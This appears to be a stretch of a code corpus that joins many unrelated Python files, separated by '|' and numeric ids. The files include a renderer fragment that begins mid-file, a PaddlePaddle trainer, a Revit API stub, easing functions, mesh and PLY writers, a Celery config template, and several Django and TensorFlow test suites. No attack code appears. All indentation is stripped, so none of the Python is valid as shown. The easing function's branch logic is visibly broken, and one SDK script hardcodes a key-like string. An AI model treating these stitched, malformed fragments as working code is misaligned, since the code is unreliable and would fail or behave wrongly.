img_out = Image.fromarray(img_out).convert('RGB')
elif self.colors == 'depth':
img_out = (255 * np.ones((h, w))).astype(np.uint8)
if mask_pred.sum() > 0:
p_world_hat = p_world_hat[mask_pred].unsqueeze(0)
d_values = transform_to_camera_space(
p_world_hat, camera_mat, world_mat,
scale_mat).squeeze(0)[:, -1].cpu().numpy()
m = d_values[d_values != np.inf].min()
M = d_values[d_values != np.inf].max()
d_values = 0.5 + 0.45 * (d_values - m) / (M - m)
d_image_values = d_values * 255
img_out[p_loc[:, 1], p_loc[:, 0]] = \
d_image_values.astype(np.uint8)
img_out = Image.fromarray(img_out).convert("L")
stats_dict['time_eval_color'] = time.time() - t0
return img_out
def export(self, img_list, img_out_path, modelname='model0'):
''' Exports the image list.
Args:
img_list (list): list of images
img_out_path (string): output path
modelname (string): model name
'''
model_path = os.path.join(img_out_path, modelname)
if not os.path.exists(model_path):
os.makedirs(model_path)
for i in range(self.n_views):
out_file = os.path.join(model_path, '%06d.png' % i)
img_list[i].save(out_file)
return 0
def estimate_colors(self, vertices, c=None):
''' Estimates the colors for provided vertices.
Args:
vertices (Numpy array): mesh vertices
c (tensor): latent conditioned code c
'''
device = self.device
vertices = torch.FloatTensor(vertices)
vertices_split = torch.split(vertices, self.points_batch_size)
colors = []
for vi in vertices_split:
vi = vi.to(device)
with torch.no_grad():
ci = self.model.decode_color(vi, c).squeeze(0).cpu()
colors.append(ci)
colors = np.concatenate(colors, axis=0)
colors = np.clip(colors, 0, 1)
colors = (colors * 255).astype(np.uint8)
colors = np.concatenate([
colors,
np.full((colors.shape[0], 1), 255, dtype=np.uint8)], axis=1)
return colors
|
1709147
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tqdm import tqdm
from abc import ABCMeta, abstractmethod
import paddle
import paddle.nn as nn
from paddle.io import DataLoader
from paddlemm.models import CMML, NIC, SCAN, SGRAF, AoANet, EarlyFusion, LateFusion, LMFFusion, TMCFusion, VSEPP, IMRAM
from paddlemm.datasets import BasicDataset, SemiDataset, PretrainDataset, SampleDataset
DatasetMap = {
'basic': BasicDataset,
'semi': SemiDataset,
'sample': SampleDataset,
'pretrain': PretrainDataset
}
ModelMap = {
'cmml': CMML,
'nic': NIC,
'scan': SCAN,
'vsepp': VSEPP,
'imram': IMRAM,
'sgraf': SGRAF,
'aoanet': AoANet,
'earlyfusion': EarlyFusion,
'latefusion': LateFusion,
'lmffusion': LMFFusion,
'tmcfusion': TMCFusion
}
class BaseTrainer(metaclass=ABCMeta):
def __init__(self, opt):
self.model_name = opt.model_name.lower()
self.out_root = opt.out_root
self.logger = opt.logger
self.num_epochs = opt.num_epochs
self.batch_size = opt.batch_size
self.learning_rate = opt.learning_rate
self.task = opt.task
self.weight_decay = opt.get('weight_decay', 0.)
self.pretrain_epochs = opt.get('pretrain_epochs', 0)
self.num_workers = opt.get('num_workers', 0)
self.val_epoch = opt.get('val_epoch', 1)
# choose metric for select best model during training
self.select_metric = opt.get('select_metric', 'loss')
self.dataset = DatasetMap[opt.data_mode](**opt)
opt.vocab_size = self.dataset.vocab_size
opt.vocab = str(self.dataset.word2idx)
self.model = ModelMap[opt.model_name.lower()](**opt)
self.grad_clip = opt.get('grad_clip', 0)
if self.grad_clip:
self.grad_clip = nn.clip.ClipGradByValue(opt.grad_clip)
else:
self.grad_clip = None
self.step_size = opt.get('step_size', 0)
self.gamma = opt.get('gamma', 0.1)
if self.step_size:
self.scheduler = paddle.optimizer.lr.StepDecay(learning_rate=self.learning_rate, step_size=self.step_size,
gamma=self.gamma)
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.scheduler,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
else:
self.optimizer = paddle.optimizer.Adam(parameters=self.model.parameters(),
learning_rate=self.learning_rate,
weight_decay=self.weight_decay,
grad_clip=self.grad_clip)
def train(self):
if self.pretrain_epochs > 0:
self.pretrain()
for epoch in range(1, self.num_epochs + 1):
all_loss = []
self.model.train()
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
batch['epoch'] = epoch
loss = self.model(batch)
loss.backward()
self.optimizer.step()
self.optimizer.clear_grad()
all_loss.append(loss.item())
train_tqdm.set_description("Epoch: {} | Loss: {:.3f}".format(epoch, loss.item()))
train_tqdm.close()
if self.step_size:
self.scheduler.step()
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'temp.pdparams'))
if epoch % self.val_epoch == 0:
val_res = self.evaluate()
if self.select_metric == 'loss':
if val_res['loss'] < self.best_loss:
self.best_loss = val_res['loss']
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid loss: {:.3f}, Best: {:.3f}".format(epoch, val_res['loss'], self.best_loss))
else:
if val_res[self.select_metric] > self.best_score:
self.best_score = val_res[self.select_metric]
paddle.save(self.model.state_dict(), os.path.join(self.out_root, 'best_model.pdparams'))
self.logger.info("Epoch: {}, valid score: {:.3f}, Best: {:.3f}".format(epoch, val_res[self.select_metric],
self.best_score))
def pretrain(self):
# for cmml pretraining
self.model.train()
for epoch in range(1, self.pretrain_epochs + 1):
all_loss = []
train_loader = DataLoader(self.dataset.train_(),
batch_size=self.batch_size * 8, # mul 8 to train total supervised data
shuffle=True,
num_workers=self.num_workers)
train_tqdm = tqdm(train_loader(), ncols=80)
for idx, batch in enumerate(train_tqdm):
self.optimizer.clear_grad()
loss = self.model.pretrain(batch)
loss.backward()
self.optimizer.step()
all_loss.append(loss.item())
train_tqdm.set_description("Pretrain epoch: {} | Loss: {:.3f}".format(epoch, np.mean(all_loss)))
@abstractmethod
def evaluate(self):
pass
@abstractmethod
def test(self):
pass
|
1709150
|
class AppearanceAssetElement(Element,IDisposable):
""" An element that represents an appearance asset for use in composing material definitions. """
@staticmethod
def Create(document,name,asset):
"""
Create(document: Document,name: str,asset: Asset) -> AppearanceAssetElement
Creates a new AppearancAssetElement.
document: The document in which to create the AppearanceAssetElement.
name: The name of the AppearanceAssetElement.
asset: The rendering asset of the element.
Returns: The new AppearanceAssetElement.
Note that document will own this pointer,
you should access it without owning it.
"""
pass
def Dispose(self):
""" Dispose(self: Element,A_0: bool) """
pass
@staticmethod
def GetAppearanceAssetElementByName(doc,name):
"""
GetAppearanceAssetElementByName(doc: Document,name: str) -> AppearanceAssetElement
Gets an AppearanceAssetElement by name.
doc: Document containing the AppearanceAssetElement.
name: Name of the AppearanceAssetElement.
"""
pass
def getBoundingBox(self,*args):
""" getBoundingBox(self: Element,view: View) -> BoundingBoxXYZ """
pass
def GetRenderingAsset(self):
"""
GetRenderingAsset(self: AppearanceAssetElement) -> Asset
Gets the rendering asset for the appearance asset element.
Returns: The rendering asset held by this appearance asset element.
"""
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: Element,disposing: bool) """
pass
def setElementType(self,*args):
""" setElementType(self: Element,type: ElementType,incompatibleExceptionMessage: str) """
pass
def SetRenderingAsset(self,asset):
"""
SetRenderingAsset(self: AppearanceAssetElement,asset: Asset)
Sets the rendering asset for the appearance asset element.
asset: The new rendering asset.It should be an appearance asset.
"""
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
|
1709186
|
import math
import easing_functions as ef
from fontTools.misc.bezierTools import splitCubic, splitLine
from typing import List
eases = dict(
cei=ef.CubicEaseIn,
ceo=ef.CubicEaseOut,
ceio=ef.CubicEaseInOut,
qei=ef.QuadEaseIn,
qeo=ef.QuadEaseOut,
qeio=ef.QuadEaseInOut,
eei=ef.ExponentialEaseIn,
eeo=ef.ExponentialEaseOut,
eeio=ef.ExponentialEaseInOut,
sei=ef.SineEaseIn,
seo=ef.SineEaseOut,
seio=ef.SineEaseInOut,
bei=ef.BounceEaseIn,
beo=ef.BounceEaseOut,
beio=ef.BounceEaseInOut,
eleo=ef.ElasticEaseOut,
elei=ef.ElasticEaseIn,
elieo=ef.ElasticEaseInOut,
eleio=ef.ElasticEaseInOut)
def curve_pos_and_speed(curve, x):
x1000 = x*1000
for idx, (action, pts) in enumerate(curve.value):
if action in ["moveTo", "endPath", "closePath"]:
continue
last_action, last_pts = curve.value[idx-1]
if action == "curveTo":
o = -1
a = last_pts[-1]
b, c, d = pts
if x1000 == a[0]:
o = a[1]/1000
eb = a
ec = b
elif x1000 == d[0]:
o = d[1]/1000
eb = c
ec = d
elif x1000 > a[0] and x1000 < d[0]:
e, f = splitCubic(a, b, c, d, x1000, isHorizontal=False)
ez, ea, eb, ec = e
o = ec[1]/1000
else:
continue
tangent = math.degrees(math.atan2(ec[1] - eb[1], ec[0] - eb[0]) + math.pi*.5)
#print(o, tangent)
if tangent >= 90:
t = (tangent - 90)/90
else:
t = tangent/90
if o != -1:
return o, t
raise Exception("No curve value found!")
def ease(style, x):
"""
Though available as a general-purpose function, this logic is usually accessed through something like the `.progress` function on an animation or timeable.
Return two values — the first is the easing result at a given time x; the second is the tangent to that, if calculable (is not, atm, calculable for the mnemonics given)
for reference, easing mnemonics:
* cei = CubicEaseIn
* ceo = CubicEaseOut
* ceio = CubicEaseInOut
* qei = QuadEaseIn
* qeo = QuadEaseOut
* qeio = QuadEaseInOut
* eei = ExponentialEaseIn
* eeo = ExponentialEaseOut
* eeio = ExponentialEaseInOut
* sei = SineEaseIn
* seo = SineEaseOut
* seio = SineEaseInOut
* bei = BounceEaseIn
* beo = BounceEaseOut
* beio = BounceEaseInOut
* eleo = ElasticEaseOut
* elei = ElasticEaseIn,
* eleio = ElasticEaseInOut
"""
if style == "linear" or style == "lin" or style == "l":
return x, 0.5
e = eases.get(style)
if e:
return e().ease(x), 0.5
elif hasattr(style, "moveTo"):
return style.ease_t(x), 0.5
return curve_pos_and_speed(style, x)
elif type(style).__name__ == "Glyph":
from coldtype.pens.draftingpen import DraftingPen
p = DraftingPen().glyph(style)
return p.ease_t(x), 0.5
elif False:
if style in easer_ufo:
return curve_pos_and_speed(DATPen().glyph(easer_ufo[style]), x)
else:
raise Exception("No easing function with that mnemonic")
else:
raise Exception("No easing function with that mnemonic")
def _loop(t, times=1, cyclic=True, negative=False):
lt = t*times*2
ltf = math.floor(lt)
ltc = math.ceil(lt)
lt = lt - ltf
if cyclic and ltf%2 == 1:
if negative:
lt = -lt
else:
lt = 1 - lt
return lt, ltf
def ez(t, easefn="eeio", loops=0, cyclic=True, rng=(0, 1)):
t = max(0, min(1, t))
if loops > 0:
t, _ = _loop(t, times=loops, cyclic=cyclic)
e, _ = ease(easefn, t)
ra, rb = rng
if ra > rb:
e = 1 - e
rb, ra = ra, rb
return ra + e*(rb - ra)
|
1709192
|
class TestFunctional:
def test_create_domain(self, client):
headers = {"X-Api-Key": "123"}
# create user
data = {"email": "<EMAIL>"}
post_res = client.post("/api/user/add", data=data, headers=headers)
json_data = post_res.get_json()
user_id = json_data["data"]["id"]
# add domain
data = {"zone": "company.com", "user_id": user_id}
res = client.post("/api/domain/add", data=data, headers=headers)
create_domain_data = res.get_json()
# list domain
res = client.get("/api/domain/list", headers=headers)
list_domain_data = res.get_json()
assert create_domain_data["code"] == 201
assert create_domain_data["data"]["zone"] == "company.com"
assert list_domain_data["code"] == 200
assert list_domain_data["data"][0]["zone"] == "company.com"
# 4: SOA, NS, NS, CNAME
assert len(list_domain_data["data"][0]["records"]) == 4
|
1709211
|
import numpy as np
#this is not an efficient implementation. just for testing!
def dual_contouring_47_test(int_grid, float_grid):
all_vertices = []
all_triangles = []
int_grid = np.squeeze(int_grid)
dimx,dimy,dimz = int_grid.shape
vertices_grid = np.full([dimx,dimy,dimz], -1, np.int32)
#all vertices
for i in range(0,dimx-1):
for j in range(0,dimy-1):
for k in range(0,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i+1,j,k]
v2 = int_grid[i+1,j+1,k]
v3 = int_grid[i,j+1,k]
v4 = int_grid[i,j,k+1]
v5 = int_grid[i+1,j,k+1]
v6 = int_grid[i+1,j+1,k+1]
v7 = int_grid[i,j+1,k+1]
if v1!=v0 or v2!=v0 or v3!=v0 or v4!=v0 or v5!=v0 or v6!=v0 or v7!=v0:
#add a vertex
vertices_grid[i,j,k] = len(all_vertices)
pos = float_grid[i,j,k]+np.array([i,j,k], np.float32)
all_vertices.append(pos)
all_vertices = np.array(all_vertices, np.float32)
#all triangles
#i-direction
for i in range(0,dimx-1):
for j in range(1,dimy-1):
for k in range(1,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i+1,j,k]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k],vertices_grid[i,j,k-1]])
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j-1,k],vertices_grid[i,j,k]])
else:
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k-1],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i,j-1,k-1],vertices_grid[i,j,k],vertices_grid[i,j-1,k]])
#j-direction
for i in range(1,dimx-1):
for j in range(0,dimy-1):
for k in range(1,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i,j+1,k]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k-1],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k],vertices_grid[i-1,j,k]])
else:
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i,j,k],vertices_grid[i,j,k-1]])
all_triangles.append([vertices_grid[i-1,j,k-1],vertices_grid[i-1,j,k],vertices_grid[i,j,k]])
#k-direction
for i in range(1,dimx-1):
for j in range(1,dimy-1):
for k in range(0,dimz-1):
v0 = int_grid[i,j,k]
v1 = int_grid[i,j,k+1]
if v0!=v1:
if v0==0:
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i-1,j,k],vertices_grid[i,j,k]])
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j,k],vertices_grid[i,j-1,k]])
else:
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j,k],vertices_grid[i-1,j,k]])
all_triangles.append([vertices_grid[i-1,j-1,k],vertices_grid[i,j-1,k],vertices_grid[i,j,k]])
all_triangles = np.array(all_triangles, np.int32)
return all_vertices, all_triangles
def write_obj_triangle(name, vertices, triangles):
fout = open(name, 'w')
for ii in range(len(vertices)):
fout.write("v "+str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
for ii in range(len(triangles)):
fout.write("f "+str(int(triangles[ii,0]+1))+" "+str(int(triangles[ii,1]+1))+" "+str(int(triangles[ii,2]+1))+"\n")
fout.close()
def write_ply_triangle(name, vertices, triangles):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("element face "+str(len(triangles))+"\n")
fout.write("property list uchar int vertex_index\n")
fout.write("end_header\n")
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
for ii in range(len(triangles)):
fout.write("3 "+str(triangles[ii,0])+" "+str(triangles[ii,1])+" "+str(triangles[ii,2])+"\n")
fout.close()
def write_ply_point(name, vertices):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("end_header\n")
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+"\n")
fout.close()
def write_ply_point_normal(name, vertices, normals=None):
fout = open(name, 'w')
fout.write("ply\n")
fout.write("format ascii 1.0\n")
fout.write("element vertex "+str(len(vertices))+"\n")
fout.write("property float x\n")
fout.write("property float y\n")
fout.write("property float z\n")
fout.write("property float nx\n")
fout.write("property float ny\n")
fout.write("property float nz\n")
fout.write("end_header\n")
if normals is None:
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+" "+str(vertices[ii,3])+" "+str(vertices[ii,4])+" "+str(vertices[ii,5])+"\n")
else:
for ii in range(len(vertices)):
fout.write(str(vertices[ii,0])+" "+str(vertices[ii,1])+" "+str(vertices[ii,2])+" "+str(normals[ii,0])+" "+str(normals[ii,1])+" "+str(normals[ii,2])+"\n")
fout.close()
def read_intersectionpn_file_as_2d_array(name):
fp = open(name, 'rb')
line = fp.readline().strip()
if not line.startswith(b'#intersectionpn'):
raise IOError('Not an intersectionpn file')
dims = list(map(int, fp.readline().strip().split(b' ')[1:]))
point_nums = np.array(list(map(int, fp.readline().strip().split(b' '))),np.int32)
line = fp.readline()
data = np.frombuffer(fp.read(), dtype=np.float32)
data = data.reshape([np.sum(point_nums),6])
fp.close()
separated = []
count = 0
for i in range(len(point_nums)):
separated.append(np.ascontiguousarray(data[count:count+point_nums[i]]))
count += point_nums[i]
return separated
def read_sdf_file_as_3d_array(name):
fp = open(name, 'rb')
line = fp.readline().strip()
if not line.startswith(b'#sdf'):
raise IOError('Not a sdf file')
dims = list(map(int, fp.readline().strip().split(b' ')[1:]))
line = fp.readline()
data = np.frombuffer(fp.read(), dtype=np.float32)
data = data.reshape(dims)
fp.close()
return data
|
1709253
|
import os
import os.path
import torch
from utils.data_aug import Lighting
from torchvision import datasets, transforms
class Dataloder():
def __init__(self, config):
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform_train = transforms.Compose([
transforms.Resize(256),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ColorJitter(0.4,0.4,0.4),
transforms.ToTensor(),
Lighting(0.1),
normalize,
])
transform_test = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
])
trainset = datasets.ImageFolder(os.path.join(config.dataset_path, 'train'), transform_train)
testset = datasets.ImageFolder(os.path.join(config.dataset_path, 'test'), transform_test)
kwargs = {'num_workers': 8, 'pin_memory': True} if config.cuda else {}
trainloader = torch.utils.data.DataLoader(trainset, batch_size=
config.batch_size, shuffle=True, **kwargs)
testloader = torch.utils.data.DataLoader(testset, batch_size=
config.batch_size, shuffle=False, **kwargs)
self.trainloader = trainloader
self.testloader = testloader
self.classes = trainset.classes
def getloader(self):
return self.classes, self.trainloader, self.testloader
if __name__ == "__main__":
data_dir = 'dataset/gtos-mobile'
trainset = datasets.ImageFolder(os.path.join(data_dir, 'train'))
testset = datasets.ImageFolder(os.path.join(data_dir, 'test'))
print(trainset.classes)
print(len(testset))
|
1709261
|
def c_star(x, β, γ):
return (1 - β ** (1/γ)) * x
def v_star(x, β, γ):
return (1 - β**(1 / γ))**(-γ) * (x**(1-γ) / (1-γ))
|
1709388
|
import time
import sys
from sdk.actions import *
if __name__ == "__main__":
print_all_domains("0lt017548f8774f9602b4e25743050d3a8ab37f1341")
sys.exit(-1)
print get_domain_on_sale()
|
1709414
|
from __future__ import print_function
import digdag
def echo_params():
print('digdag params')
for k, v in digdag.env.params.items():
print(k, v)
|
1709422
|
import os
from celery import Celery
from django.conf import settings
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'openwisp2.settings')
app = Celery('openwisp2')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
{% if openwisp2_django_celery_logging %}
from celery.signals import setup_logging
from logging.config import dictConfig
@setup_logging.connect
def config_loggers(*args, **kwargs):
dictConfig(settings.LOGGING)
{% else %}
if hasattr(settings, 'RAVEN_CONFIG'):
from raven.contrib.celery import register_logger_signal, register_signal
from raven.contrib.django.raven_compat.models import client
register_logger_signal(client)
register_signal(client, ignore_expected=True)
{% endif %}
|
1709423
|
from util.observe import Observable
from util.primitives.funcs import do
class SlotsSavable(object):
'''
Prereqs:
1) use slots
2) only store persistent information in slots
3) child objects stored in slots must also be SlotSavable (or pickleable)
'''
def __getstate__(self):
return dict((k, getattr(self, k)) for k in self.__slots__)
def __setstate__(self, info):
do(setattr(self, key, info.get(key, None)) for key in self.__slots__)
def __eq__(self, s):
try:
return all(getattr(self, attr) == getattr(s, attr) for attr in self.__slots__)
except Exception:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
val = 0
for child in [getattr(self, slot) for slot in self.__slots__]:
if isinstance(child, list):
for c in child:
val ^= c.__hash__()
elif isinstance(child, dict):
for k,v in child.iteritems():
val ^= v.__hash__()
else:
val ^= child.__hash__()
return val
class ObservableSlotsSavable(SlotsSavable, Observable):
'''
Prereqs:
1) use slots
2) only store persistent information in slots
3) child objects stored in slots must also be SlotSavable (or pickleable)
'''
def __init__(self):
Observable.__init__(self)
def __setstate__(self, info):
if not hasattr(self, 'observers'):
Observable.__init__(self)
return SlotsSavable.__setstate__(self, info)
|
1709473
|
from django.contrib.auth.models import User
from rest_framework.test import APITestCase
from rest_framework.reverse import reverse
from rest_framework import status
from rest_api.models import Repo
from datetime import datetime
from rest_api.tests.assertors import RepoAssertorNested, RepoAssertor
from rest_api.tests.common import vcr, create_platform
class RepoTests(APITestCase):
@vcr.use_cassette()
def test_get_repos_when_single_repo_saved(self):
"""
Ensure get repos returns one repo with all the expected fields
"""
create_repo()
url = reverse('repos')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
RepoAssertorNested.assertAllFields(self, response.data[0])
@vcr.use_cassette()
def test_get_repos_when_multiple_repos_saved(self):
"""
Ensure get repos returns multiple repos if there is more than one saved
"""
repos = [
create_repo(title="Repo 1"),
create_repo(title="Repo 2"),
create_repo(title="Repo 3"),
]
url = reverse('repos')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(repos), len(response.data))
for app_response in response.data:
RepoAssertorNested.assertAllFields(self, app_response)
def test_post_repos_empty_body(self):
"""
Ensure posting to repos when body is empty returns 400
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
url = reverse('repos')
response = self.client.post(url, {}, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_repos_non_authenticated_fails(self):
"""
Check posting to repos without authentication return 401
"""
platform = create_platform()
data = make_repo_data_with_all_fields(platform.id)
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_post_repo_with_all_fields(self):
"""
Ensure we can create a new repo when sending a body that contains all the possible fields
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
platform = create_platform()
data = make_repo_data_with_all_fields(platform.id)
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
RepoAssertor.assertRequiredFields(self, response.data)
def test_post_repo_with_required_fields(self):
"""
Ensure we can create a new repo when sending a body that contains ONLY the required fields
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
data = make_repo_data_with_required_fields()
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
RepoAssertor.assertRequiredFields(self, response.data)
def test_post_repo_with_invalid_color(self):
"""
Sending an invalid color returns 400
"""
user = User.objects.create(username='ivan')
self.client.force_authenticate(user=user)
data = make_repo_data_with_required_fields()
data['color'] = '#FFCC'
url = reverse('repos')
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# Helper Methods and classes #
def create_repo(title='Best repo ever', platform=None):
if not platform:
platform = create_platform()
return Repo.objects.create(
title=title,
subtitle='Subtitle',
url='https://github.com/ivacf/archi',
start_date=datetime.now(),
end_date=datetime.now(),
image='media/images/image.png',
color='#FFFFFF',
platform=platform
)
def make_repo_data_with_required_fields():
return {
'title': 'Repo title',
'subtitle': 'Repo subtitle',
'url': 'http://ivanc.uk',
'start_date': '2016-01-15',
'color': '#FFFFFF'
}
def make_repo_data_with_all_fields(platform_id):
data = make_repo_data_with_required_fields()
data.update({
'end_date': '2016-06-15',
'platform': platform_id
})
return data
|
1709540
|
from unittest.mock import MagicMock
import pytest
import numpy as np
import scipy as sp
import scipy.stats
import tensorflow as tf
from decompose.likelihoods.normal2dLikelihood import Normal2dLikelihood
from decompose.tests.fixtures import device, dtype
from decompose.distributions.distribution import UpdateType
@pytest.fixture(scope="module",
params=[0, 1])
def f(request):
f = request.param
return(f)
@pytest.fixture(scope="module",
params=[UpdateType.ALL, UpdateType.ONLYLATENTS])
def updateType(request):
updateType = request.param
return(updateType)
def test_residuals(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
r = lh.residuals(U, data)
assert(r.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npr = sess.run(r)
assert(np.allclose(noise.flatten(), npr, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_loss(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
loss = lh.loss(U, data)
assert(loss.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
nploss = sess.run(loss)
assert(np.allclose(np.sum(noise**2), nploss, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_llh(device, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
U = (tf.constant(np.random.normal(size=(K, M[0])).astype(npdtype)),
tf.constant(np.random.normal(size=(K, M[1])).astype(npdtype)))
noise = np.random.normal(size=M).astype(npdtype)
data = tf.matmul(tf.transpose(U[0]), U[1]) + tf.constant(noise)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
llh = lh.llh(U, data)
assert(llh.dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npllh = sess.run(llh)
llhgt = np.sum(sp.stats.norm(loc=0., scale=1./np.sqrt(tau)).logpdf(noise))
assert(np.allclose(llhgt, npllh, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_prepVars(device, f, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
npU = (np.random.normal(size=(K, M[0])).astype(npdtype),
np.random.normal(size=(K, M[1])).astype(npdtype))
U = (tf.constant(npU[0]), tf.constant(npU[1]))
npnoise = np.random.normal(size=M).astype(npdtype)
npdata = np.dot(npU[0].T, npU[1]) + npnoise
data = tf.constant(npdata, dtype=dtype)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, dtype=dtype)
lh.init(data=data)
A, B, alpha = lh.prepVars(f, U, data)
assert(A.dtype == dtype)
assert(B.dtype == dtype)
assert(alpha.dtype.base_dtype == dtype)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
npA, npB, npalpha = sess.run([A, B, alpha])
if f == 0:
Agt = np.dot(npdata, npU[1].T)
Bgt = np.dot(npU[1], npU[1].T)
assert(np.allclose(Agt, npA, atol=1e-5, rtol=1e-5))
assert(np.allclose(Bgt, npB, atol=1e-5, rtol=1e-5))
assert(np.allclose(tau, npalpha, atol=1e-5, rtol=1e-5))
if f == 1:
Agt = np.dot(npdata.T, npU[0].T)
Bgt = np.dot(npU[0], npU[0].T)
assert(np.allclose(Agt, npA, atol=1e-5, rtol=1e-5))
assert(np.allclose(Bgt, npB, atol=1e-5, rtol=1e-5))
assert(np.allclose(tau, npalpha, atol=1e-5, rtol=1e-5))
tf.reset_default_graph()
def test_update(device, f, updateType, dtype):
npdtype = dtype.as_numpy_dtype
M, K, tau = (20, 30), 3, 0.1
npU = (np.random.normal(size=(K, M[0])).astype(npdtype),
np.random.normal(size=(K, M[1])).astype(npdtype))
U = (tf.constant(npU[0]), tf.constant(npU[1]))
npnoise = np.random.normal(size=M).astype(npdtype)
npdata = np.dot(npU[0].T, npU[1]) + npnoise
data = tf.constant(npdata, dtype=dtype)
lh = Normal2dLikelihood(M=M, K=K, tau=tau, updateType=updateType)
lh.init(data=data)
lh.noiseDistribution.update = MagicMock()
residuals = tf.ones_like(data)
lh.residuals = MagicMock(return_value=residuals)
lh.update(U, data)
if updateType == UpdateType.ALL:
lh.residuals.assert_called_once()
lh.noiseDistribution.update.assert_called_once()
else:
lh.residuals.assert_not_called()
lh.noiseDistribution.update.assert_not_called()
tf.reset_default_graph()
|
1709560
|
from sacrebleu import corpus_bleu, TOKENIZERS, DEFAULT_TOKENIZER
from sumeval.metrics.lang.base_lang import BaseLang
from sumeval.metrics.lang import get_lang
